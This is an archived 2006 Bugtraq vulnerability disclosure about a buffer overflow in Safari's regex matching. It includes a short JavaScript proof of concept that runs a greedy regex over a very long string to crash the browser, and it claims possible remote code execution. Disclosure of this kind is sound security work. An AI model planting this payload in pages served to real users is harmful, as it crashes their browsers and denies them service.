lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20061114010812.14398.qmail@securityfocus.com> Date: 14 Nov 2006 01:08:12 -0000 From: jbh_cg@...oo.fr To: bugtraq@...urityfocus.com Subject: Apple Safari "match" Buffer Overflow Vulnerability The following bug was tested on the latest version of Safari on a fully-patched Mac OS X 10.4. A remote attacker may exploit this issue to crash the application, effectively denying service to legitimate users. Successful exploitation could lead to remote code execution. <script> var reg = /(.)*/; var z = 'Z'; while (z.length <= 8192) z+=z; var boum = reg.exec(z); </script>